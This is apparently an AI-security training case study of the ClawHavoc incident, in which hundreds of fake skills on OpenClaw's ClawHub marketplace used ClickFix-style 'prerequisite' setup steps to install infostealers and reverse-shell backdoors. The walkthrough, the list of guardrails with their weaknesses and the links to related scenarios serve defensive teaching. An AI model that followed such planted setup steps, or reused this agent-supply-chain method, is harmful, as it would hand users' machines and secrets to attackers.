Case study

ClawHavoc — mass poisoning of OpenClaw's ClawHub agent-skill marketplace

Real-world incident01 Feb 2026🗺️ Tool-Using Agent

Attackers flooded ClawHub — the skill marketplace for the popular OpenClaw AI agent — with at least 341 malicious 'skills' that tricked agents/users into installing the Atomic macOS Stealer and reverse-shell backdoors.

Root cause — why it happened

The OpenClaw agent gets new abilities by installing community 'skills' from an online store called ClawHub — much like adding apps to a phone. People pick a skill by its name, its polished description and its apparent popularity. Attackers flooded that store with hundreds of fake skills dressed up as useful tools. Each one's instructions included a 'before you can use this' setup step that told the user (or their agent) to run a command or open a password-protected file. That step quietly installed data-stealing malware and a hidden remote-control backdoor, then shipped the victim's secrets off to the attacker. The core problem isn't that the AI was tricked by clever words inside a document — it's that the marketplace let anyone publish a skill with no real proof of who made it, and nothing checked the 'setup' command before a human was nudged into running it on their own machine.

Risks this case illustrates

Supply-Chain Compromise Model Backdoors / Sleeper Agents Rogue & Impersonated Agents

Named in the standard (OWASP/ATLAS/NIST) lens. Click a highlighted component in the diagram below to see which risks attach where.

How it unfolded

← / → to step · click a component to inspect

InstructionsDataActionsControl / decisionFeedback / logs

👆 Click a component to inspect its risks

SetupStep 1 / 6

Attackers flood the marketplace with fake skills

OpenClaw is a hugely popular open-source AI agent, and it gets new powers by installing community 'skills' from a store called ClawHub. Anyone can publish a skill there. Attackers took advantage of that: starting in late January 2026 they uploaded a flood of fake skills, each one polished to look like a genuinely useful tool, with a professional description to win trust. The store had no real way to prove who made each skill.

🌐ClawHub listing (illustrative)webpage

ClawHub > Skills > productivity

  fast-notes-sync   ★★★★☆  (impersonates a real utility)
    "Sync your notes across devices from OpenClaw. Trusted by thousands."
    publisher: not verified   signature: none   downloads: (inflated)

  [+] Install        [ View source ]      [ Report ]
# Catalog metadata looks clean. No signed authorship. Payload is in the docs.
# ≥341 such listings found among ~2,857 live skills; 335 one campaign.

Step 1 / 6

Controls & guardrails — what would have stopped it

Two things break this chain. First, make the marketplace prove who made each skill — signed by a known publisher and reviewed — so attackers can't flood it with hundreds of fakes that ride on fake popularity. Second, treat a skill's 'setup step' as dangerous by default: never auto-run it, run it in a locked-down sandbox, and make a human approve anything that wants to execute code or phone home. Together, a fake 'prerequisite' command has nowhere to detonate. Filtering the skill's description wouldn't help — the trap was in human-facing instructions, and the harm ran outside the AI entirely.

Preventive

Provenance & content signing
Provenance proves origin, not safety; a trusted source can still be wrong or compromised. Requires discipline to propagate metadata end to end.
MCP/plugin pinning, manifest hashing & re-review
addressesSupply-Chain Compromise
Review catches what reviewers understand; a subtle malicious directive can pass. Pinning helps only if you actually re-review on update rather than auto-accepting.
Human-in-the-loop approval on high-risk actions
Approval fatigue turns gates into rubber stamps; gates placed after the point of no return do nothing; and approvers can be misled by a model-written summary of the action.
Egress allowlisting & DLP on tool arguments
Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.
Least-privilege identity & scoped credentials
Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.
User AI-literacy & verification workflows
Relies on human diligence under time pressure; automation bias is strong and training decays. A backstop, not a guarantee.

Detective

Runtime monitoring & anomaly detection
Detects the anomalous, not the novel-but-subtle; high false-positive rates cause alert fatigue. Always a step behind a sufficiently quiet attacker.
Full-trace audit logging
Logging is forensic, not preventive — it explains harm after the fact. Useless if no one reviews it or if the materialised context isn't captured.

Corrective

Governance: risk assessment, red-teaming & incident response
addressesSupply-Chain Compromise Model Backdoors / Sleeper Agents
Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.
Loop/cost circuit-breakers & consistency checks
Thresholds are blunt — too tight breaks legitimate long tasks, too loose lets damage accrue first. Catches runaway dynamics, not a single well-formed bad decision.

All guardrails for Supply-Chain Compromise →All guardrails for Model Backdoors / Sleeper Agents →All guardrails for Rogue & Impersonated Agents →

Lessons

▸ The capability marketplace is the agentic supply-chain attack surface: poisoning the store that provisions agent 'skills' turns an ordinary 'install a skill' workflow into mass host compromise (≥341 malicious skills; 335 one campaign 'ClawHavoc').
▸ Reputation is forgeable; provenance is the boundary. ClawHub selected skills by name/description/popularity with no signed authorship, so a coordinated actor sybil-published hundreds of lookalikes that looked legitimate.
▸ The harm hid in human-facing docs, not in tool code the model runs. A ClickFix 'Prerequisites' step (obfuscated script / password-protected ZIP) converts a documentation read into local RCE — so description filters and agent-call validation never see it.
▸ Treat a skill's setup command as untrusted code: never auto-run 'prerequisites', sandbox install-time execution, and require human approval for any code-exec or egress — the installer-execution gate is the missing control here.
▸ Agent telemetry is blind to this class: the compromise runs outside the agent, as the user. Detection must live at the host and egress layers (new stealer/reverse-shell processes, anomalous C2) and in artifact review (password-ZIPs, obfuscation as AV-evasion tells).
▸ Counts grow as analysis deepens: figures rose from at least 341 toward 1,000+ (Trend Micro, Snyk, Antiy). Cite point-in-time numbers as 'at least 341 / 335-campaign' and attribute later totals to follow-up analysis.

Sources

ClawHavoc: 341 Malicious Skills Found by the Bot They Were Targeting — Koi Security ↗
Researchers Find 341 Malicious ClawHub Skills Stealing Data from OpenClaw Users — The Hacker News ↗
OpenClaw agents targeted with 341 malicious ClawHub skills — SC Media ↗
Koi Security — ClawHavoc: 341 Malicious Skills Found by the Bot They Were Targeting (primary) ↗ — Oren Yomtov; audit of all ~2,857 live skills (with his OpenClaw assistant 'Alex'); ≥341 malicious, 335 one campaign named ClawHavoc; ClickFix 'Prerequisites' steps dropping AMOS / Windows infostealers / reverse shells; disclosed 1 Feb 2026.
The Hacker News — Researchers Find 341 Malicious ClawHub Skills Stealing Data from OpenClaw Users ↗ — Confirms the count, the marketplace-poisoning mechanism, and the Atomic macOS Stealer / infostealer / reverse-shell payloads; counts later expanded toward 1,000+ by follow-up analysis.
SC Media — OpenClaw agents targeted with 341 malicious ClawHub skills ↗ — Independent reporting on the campaign, the skill-marketplace supply-chain vector, and skill takedown.

Practise the risk class — related scenarios

🏭Poisoning the Agent Factory

Compromise the pipeline that builds agents, and every new worker is born malicious

🚪The Classifier That Waves It Through

The safety guard is itself a trained model — and someone poisoned its lessons

🔓The Model That Forgot to Say No

A cost-saving open-weights swap quietly ships a model with its safety surgically removed

💤The Sleeper

A capable third-party model that behaves perfectly — until it sees the trigger

🔌The Tool With a Hidden Agenda

A trusted MCP email tool quietly BCCs every message to an attacker

🥸The Uninvited Agent

A forged peer registers on the agent directory — and the planner enlists it